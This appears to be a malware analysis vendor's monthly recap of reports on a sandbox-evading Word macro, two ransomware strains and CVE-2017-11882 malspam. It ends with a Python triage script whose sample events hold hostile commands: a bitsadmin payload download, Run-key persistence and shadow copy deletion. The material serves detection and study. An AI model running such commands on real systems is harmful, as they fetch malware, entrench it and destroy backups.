Welcome to the VMRay Malware Analysis Report Recap. Every month our Research Team provides a recap of the malware analysis reports posted to the VMRay Twitter account. This past January, our team analyzed a malicious Word document that uses multiple sandbox evasion techniques, a variant of BigEyes/Lime ransomware, GandCrab ransomware and Lotus Blossom malspam.
Click the links below to jump to a specific report:
- Malicious Word Doc Uses Multiple Sandbox Evasion Techniques
- BigEyes/Lime Ransomware Drops Decryption Key to C:\microsoft\hash in Plaintext
- GandCrab Ransomware
- Lotus Blossom Malspam
Report Name: Malicious Word Doc Uses Multiple Sandbox Evasion Techniques
January 10, 2018
This malicious Word document uses several techniques to detect the presence of security tools such as sandboxes and anti-virus software. All of these techniques are detected by VMRay Analyzer and listed as potential threats in the VTI section of the report (Figure 1).
In the Network tab (Figure 2), we can see the document's VBA macro connecting to a known malicious domain and to Dropbox, using bitsadmin to download the payload.
The payload uses common techniques such as process injection and adding a Windows startup entry for persistence. Both can be seen in the process graph (Figure 3), where the persistence mechanism triggers an automatic reboot of the analysis system.
The malware then steals credentials from Mozilla Firefox, Google Chrome and Internet Explorer, as well as system information (Figure 4).
Report Name: BigEyes/Lime Ransomware Drops Decryption Key to C:\microsoft\hash in Plaintext
January 17, 2018
BigEyes/Lime ransomware is written in .NET and starts encrypting files on the computer immediately. To be quick, it only encrypts files belonging to the current user, i.e. only files in the Documents, Pictures, Music, Videos and Desktop folders are affected.
Every encrypted file gets the suffix “.lime” and the system wallpaper displays the ransom note.
The ransom note demands $100 in Bitcoin for the decryption key. This key is needed by the program named "#Decryptor.exe" (Figure 7), which is dropped to the desktop and decrypts the encrypted files. However, our analysis shows that the decryption key is also dropped in "C:\microsoft\hash" in plain text, so the malware authors have made it relatively easy to decrypt the files without paying the ransom.
Report Name: GandCrab Ransomware
January 26, 2018
This file exhibits typical ransomware behavior: it encrypts all files on the user's system and demands a ransom payment for the decryption key. To ensure that the user cannot restore files from local backups, it deletes all snapshots created by the Volume Shadow Copy Service.
All encrypted files have the suffix “.GDCB” as shown in the accompanying figure.
The ransom note with further instructions on how to decrypt the user’s files is shown after a reboot.
Report Name: Lotus Blossom Malspam
January 31, 2018
This malware exploits CVE-2017-11882, a stack buffer overflow in the Equation Editor component (EQNEDT32.EXE) of Microsoft Office that is triggered by a crafted Word document. The exploit allows the malware authors to run their own code instead of the original. In this scenario, a DLL is dropped in "\appdata\roaming\microsoft\windows\chaches\navshext.dll" and injected into the browser (Internet Explorer).
The filename "navshext.dll" mimics a legitimate DLL from Norton Security antivirus software. After injection, the DLL checks whether it is running under a debugger and creates a mutex named "donotbotherme".
It then sets up persistence through a system startup routine.
Next, the malware tries to connect to its Command and Control (C2) server. If this is unsuccessful, the malware sleeps forever (roughly 19 years). If it succeeds, it uploads information about the victim's system and waits for commands.
All of these behavior patterns are indicators of an information stealer or a Trojan. Some analysts have concluded that this is part of a targeted attack against ASEAN members.
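As an added example (not VMRay's code and not taken from any of the reports above), the following Python script turns the process-creation behaviours described in this recap into host-based triage rules: an Office application launching bitsadmin to fetch a payload (first report), a startup entry written to a Run key with reg.exe (a common way to implement the persistence seen in the first and last reports; the reports do not say which mechanism was used, so this is an assumption), Volume Shadow Copy deletion (GandCrab), and EQNEDT32.EXE, the Equation Editor process affected by CVE-2017-11882, spawning a child process (Lotus Blossom). The tab-separated event layout, the sample events, the rule names and the placeholder URLs and file paths are all constructed for illustration.

```python
# Added example, not VMRay's code: triage rules for the process-creation
# behaviours in this recap, run over constructed Sysmon-style events.
# Event layout (parent<TAB>image<TAB>cmdline) and sample values are assumptions.
import re
from dataclasses import dataclass
from typing import Callable, Iterable, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    parent: str   # parent image path
    image: str    # child image path
    cmdline: str  # child command line


OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (accepts \\ or / separators)."""
    return re.split(r"[\\/]", path.strip())[-1].lower()


def office_spawns_bitsadmin(e: ProcEvent) -> bool:
    """First report: a VBA macro uses bitsadmin /transfer to fetch the payload."""
    return (basename(e.parent) in OFFICE_APPS
            and basename(e.image) == "bitsadmin.exe"
            and "/transfer" in e.cmdline.lower())


def run_key_persistence(e: ProcEvent) -> bool:
    """Startup persistence written through reg.exe into a Run key (assumed mechanism)."""
    c = e.cmdline.lower()
    return basename(e.image) == "reg.exe" and " add " in c and "\\currentversion\\run" in c


def shadow_copy_deletion(e: ProcEvent) -> bool:
    """GandCrab: VSS snapshots removed via vssadmin or wmic before encryption."""
    c = e.cmdline.lower()
    img = basename(e.image)
    return ((img == "vssadmin.exe" and "delete" in c and "shadows" in c)
            or (img == "wmic.exe" and "shadowcopy" in c and "delete" in c))


def equation_editor_spawns_child(e: ProcEvent) -> bool:
    """CVE-2017-11882 lives in EQNEDT32.EXE, which Office starts as an OLE server
    (its parent is normally svchost.exe, not WINWORD.EXE), so the reliable signal
    is EQNEDT32.EXE itself creating any child process."""
    return basename(e.parent) == "eqnedt32.exe"


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("office_spawns_bitsadmin", office_spawns_bitsadmin),
    ("run_key_persistence", run_key_persistence),
    ("shadow_copy_deletion", shadow_copy_deletion),
    ("equation_editor_spawns_child", equation_editor_spawns_child),
]


def parse_events(lines: Iterable[str]) -> List[ProcEvent]:
    """Parse constructed lines of the form parent<TAB>image<TAB>cmdline."""
    events = []
    for line in lines:
        line = line.rstrip("\n")
        if not line or line.startswith("#"):
            continue
        parent, image, cmdline = line.split("\t", 2)
        events.append(ProcEvent(parent, image, cmdline))
    return events


def triage(lines: Iterable[str]) -> List[Tuple[str, str]]:
    """Return (rule name, child command line) for every event a rule matches."""
    hits = []
    for e in parse_events(lines):
        for name, rule in RULES:
            if rule(e):
                hits.append((name, e.cmdline))
    return hits


# Constructed sample events; URLs, paths and job names are placeholders.
SAMPLE_LOG = [
    "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\tC:\\Windows\\System32\\bitsadmin.exe\t"
    "bitsadmin /transfer job1 /download /priority high https://www.dropbox.com/s/placeholder/payload.exe C:\\Users\\user\\AppData\\Local\\Temp\\p.exe",
    "C:\\Users\\user\\AppData\\Local\\Temp\\p.exe\tC:\\Windows\\System32\\reg.exe\t"
    "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ /d C:\\Users\\user\\AppData\\Local\\Temp\\p.exe",
    "C:\\Users\\user\\Downloads\\sample.exe\tC:\\Windows\\System32\\vssadmin.exe\tvssadmin delete shadows /all /quiet",
    "C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.EXE\tC:\\Windows\\System32\\cmd.exe\tcmd /c start \"\" %APPDATA%\\loader.exe",
    # Benign: Word starting the print helper matches no rule.
    "C:\\Program Files\\Microsoft Office\\Office16\\WINWORD.EXE\tC:\\Windows\\System32\\splwow64.exe\tsplwow64.exe",
]

if __name__ == "__main__":
    for rule, cmd in triage(SAMPLE_LOG):
        print(f"{rule:30} {cmd}")
```

The rules match on image names and command-line substrings only, so they are a starting point for hunting rather than a signature set: a real deployment would key on full paths and signer information to avoid renamed binaries, and would add the file-write and DLL-load events (for example the navshext.dll drop path above) that these process-creation events do not cover.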